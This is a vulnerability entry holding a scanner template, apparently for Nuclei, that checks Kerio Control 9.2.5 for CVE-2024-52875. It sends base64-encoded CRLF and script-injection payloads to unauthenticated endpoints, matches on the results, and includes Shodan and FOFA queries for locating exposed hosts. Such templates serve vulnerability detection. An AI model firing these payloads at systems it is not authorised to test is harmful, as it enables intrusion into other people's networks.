漏洞描述
Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5
CVE-2024-52875: Kerio Control v9.2.5 - CRLF Injection
PoC代码[已公开]
id: CVE-2024-52875
info:
name: Kerio Control v9.2.5 - CRLF Injection
author: ritikchaddha,iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Kerio Control, formerly known as Kerio WinRoute Firewall, has been found vulnerable to multiple HTTP Response Splitting vulnerabilities in product affecting versions 9.2.5
reference:
- https://karmainsecurity.com/hacking-kerio-control-via-cve-2024-52875
- https://nvd.nist.gov/vuln/detail/CVE-2024-52875
classification:
cve-id: CVE-2024-52875
cwe-id: CWE-74
epss-score: 0.82419
epss-percentile: 0.99183
metadata:
verified: true
max-request: 4
shodan-query: "Kerio Control"
fofa-query: "Kerio Control"
tags: cve,cve2024,kerio,crlf,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/nonauth/guestConfirm.cs?dest=VGVzdA0KQ1JMRjo%3d"
- "{{BaseURL}}/nonauth/addCertException.cs?dest=VGVzdA0KQ1JMRjo%3d"
- "{{BaseURL}}/nonauth/expiration.cs?dest=VGVzdA0KQ1JMRjo%3d"
- "{{BaseURL}}/nonauth/guestConfirm.cs?dest=Cgo8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmRvbWFpbik8L3NjcmlwdD4%3d"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
part: header
regex:
- '(?m)^Crlf:\s*$'
- type: dsl
dsl:
- "contains(body,'<script>alert(document.domain)</script>')"
- 'contains(content_type, "text/html")'
- 'contains(location, "")'
- 'status_code == 302'
condition: and
# digest: 490a00463044022050c793779b47bb050a71113d6b178d3627227c9ef11cb152b68e6fd8fcbb2ff502203a4f9aa4af091910a4d7ab674f3d60a6b5be16f70be1d26400b865ee71ae59e0:922c64590222798bb761d5b6d8e72950